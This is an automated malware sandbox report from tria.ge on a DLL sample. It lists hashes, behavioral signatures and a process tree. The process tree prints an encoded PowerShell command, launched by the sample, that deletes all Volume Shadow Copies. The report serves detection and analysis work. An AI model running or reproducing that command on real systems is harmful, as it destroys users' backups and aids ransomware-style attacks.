Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
28/05/2024, 01:29
Static task
static1
Behavioral task
behavioral1
Sample
7b3d6224d8a3713471864c85b8834a4d_JaffaCakes118.dll
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
7b3d6224d8a3713471864c85b8834a4d_JaffaCakes118.dll
Resource
win10v2004-20240226-en
General
-
Target
7b3d6224d8a3713471864c85b8834a4d_JaffaCakes118.dll
-
Size
166KB
-
MD5
7b3d6224d8a3713471864c85b8834a4d
-
SHA1
0cd00ace020606adfa5046e0e9f518690f403bf3
-
SHA256
77f8df8ed8c7655aec8a386465bcd2c649350671f9400af3711a335fbc1c8c97
-
SHA512
e1436b50a5be499b69c33166cf09f3f77a57f0e2f712b679ede0e52b8fbae278c31e447297ec151428e4de44fe4026f9f97317c9a9947dc089ee235fc9250057
-
SSDEEP
3072:MJMawtnGqtWoKeZ9fh1CgnNto6jfvEIDiOA:Ww9vteqJggn7oUfpD
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\N: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1720 rundll32.exe 1724 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1720 rundll32.exe Token: SeDebugPrivilege 1724 powershell.exe Token: SeBackupPrivilege 2588 vssvc.exe Token: SeRestorePrivilege 2588 vssvc.exe Token: SeAuditPrivilege 2588 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1300 wrote to memory of 1720 1300 rundll32.exe 28 PID 1300 wrote to memory of 1720 1300 rundll32.exe 28 PID 1300 wrote to memory of 1720 1300 rundll32.exe 28 PID 1300 wrote to memory of 1720 1300 rundll32.exe 28 PID 1300 wrote to memory of 1720 1300 rundll32.exe 28 PID 1300 wrote to memory of 1720 1300 rundll32.exe 28 PID 1300 wrote to memory of 1720 1300 rundll32.exe 28 PID 1720 wrote to memory of 1724 1720 rundll32.exe 29 PID 1720 wrote to memory of 1724 1720 rundll32.exe 29 PID 1720 wrote to memory of 1724 1720 rundll32.exe 29 PID 1720 wrote to memory of 1724 1720 rundll32.exe 29 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\7b3d6224d8a3713471864c85b8834a4d_JaffaCakes118.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\7b3d6224d8a3713471864c85b8834a4d_JaffaCakes118.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2660
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2588